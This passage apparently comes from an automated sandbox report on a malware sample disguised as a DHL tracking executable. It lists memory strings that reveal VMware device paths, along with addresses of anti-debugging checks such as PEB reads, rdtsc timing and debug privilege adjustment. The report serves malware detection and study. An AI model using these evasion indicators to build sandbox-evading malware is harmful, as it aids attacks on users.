          Source: explorer.exe, 00000004.00000000.401670731.00000000062E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.553476304.0000000004F93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&
          Source: explorer.exe, 00000014.00000003.577172496.000000000F39D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000014.00000000.566169156.0000000004ED2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000014.00000003.577172496.000000000F39D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FE2Xc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000004.00000000.401670731.00000000062E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
          Source: explorer.exe, 00000014.00000003.577172496.000000000F39D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&Ms
          Source: explorer.exe, 00000014.00000003.578401411.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
          Source: explorer.exe, 00000014.00000003.578401411.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000014.00000000.566169156.0000000004ED2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA
          Source: explorer.exe, 00000014.00000003.538230272.0000000004D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000@v
          Source: explorer.exe, 00000014.00000003.577172496.000000000F39D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}bq
          Source: explorer.exe, 00000004.00000000.400458604.000000000461E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.595705023.0000000005005000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000014.00000003.553476304.0000000004F93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000000.537602479.00000000052A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000~
          Source: explorer.exe, 00000014.00000003.578870629.0000000004F84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000014.00000003.571574240.000000000F4E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.372241858.00000000082E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&+
          Source: explorer.exe, 00000014.00000003.577172496.000000000F39D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA}
          Source: explorer.exe, 00000014.00000003.552559008.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}M
          Source: explorer.exe, 00000014.00000003.553476304.0000000004F93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}A
          Source: explorer.exe, 00000014.00000003.544779988.0000000004F18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
          Source: explorer.exe, 00000014.00000003.558001527.000000000F43B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}tentDeliveryManager_cw5n1h2txyewy
          Source: explorer.exe, 00000014.00000003.558001527.000000000F43B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local<
          Source: explorer.exe, 00000014.00000003.551487673.0000000004F94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.551200673.0000000004F3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
          Source: explorer.exe, 00000004.00000000.372241858.00000000082E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000014.00000003.571183562.000000000507F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BKX~
          Source: explorer.exe, 00000014.00000003.551200673.0000000004F3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00s
          Source: explorer.exe, 00000014.00000003.553294057.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
          Source: explorer.exe, 00000014.00000003.595515909.000000000F4E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.558334108.000000000508E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9
          Source: explorer.exe, 00000014.00000000.607327645.0000000004E34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.391707126.0000000008430000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000000.398584347.000000000095C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00409AB0 rdtsc 1_2_00409AB0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_02380402 mov eax, dword ptr fs:[00000030h]0_2_02380402
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_02380616 mov eax, dword ptr fs:[00000030h]0_2_02380616
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_02380706 mov eax, dword ptr fs:[00000030h]0_2_02380706
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_02380744 mov eax, dword ptr fs:[00000030h]0_2_02380744
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_023806C7 mov eax, dword ptr fs:[00000030h]0_2_023806C7
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A490AF mov eax, dword ptr fs:[00000030h]1_2_00A490AF
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A3F0BF
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]1_2_00A3F0BF
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]1_2_00A3F0BF
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A09080 mov eax, dword ptr fs:[00000030h]1_2_00A09080
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]1_2_00A83884
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]1_2_00A83884
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A058EC mov eax, dword ptr fs:[00000030h]1_2_00A058EC
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]1_2_00A1B02A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]1_2_00A1B02A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]1_2_00A1B02A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]1_2_00A1B02A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]1_2_00AD4015
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]1_2_00AD4015
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]1_2_00A87016
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]1_2_00A87016
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]1_2_00A87016
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD1074 mov eax, dword ptr fs:[00000030h]1_2_00AD1074
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC2073 mov eax, dword ptr fs:[00000030h]1_2_00AC2073
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]1_2_00A20050
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]1_2_00A20050
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]1_2_00A361A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]1_2_00A361A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A869A6 mov eax, dword ptr fs:[00000030h]1_2_00A869A6
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]1_2_00A851BE
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]1_2_00A851BE
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]1_2_00A851BE
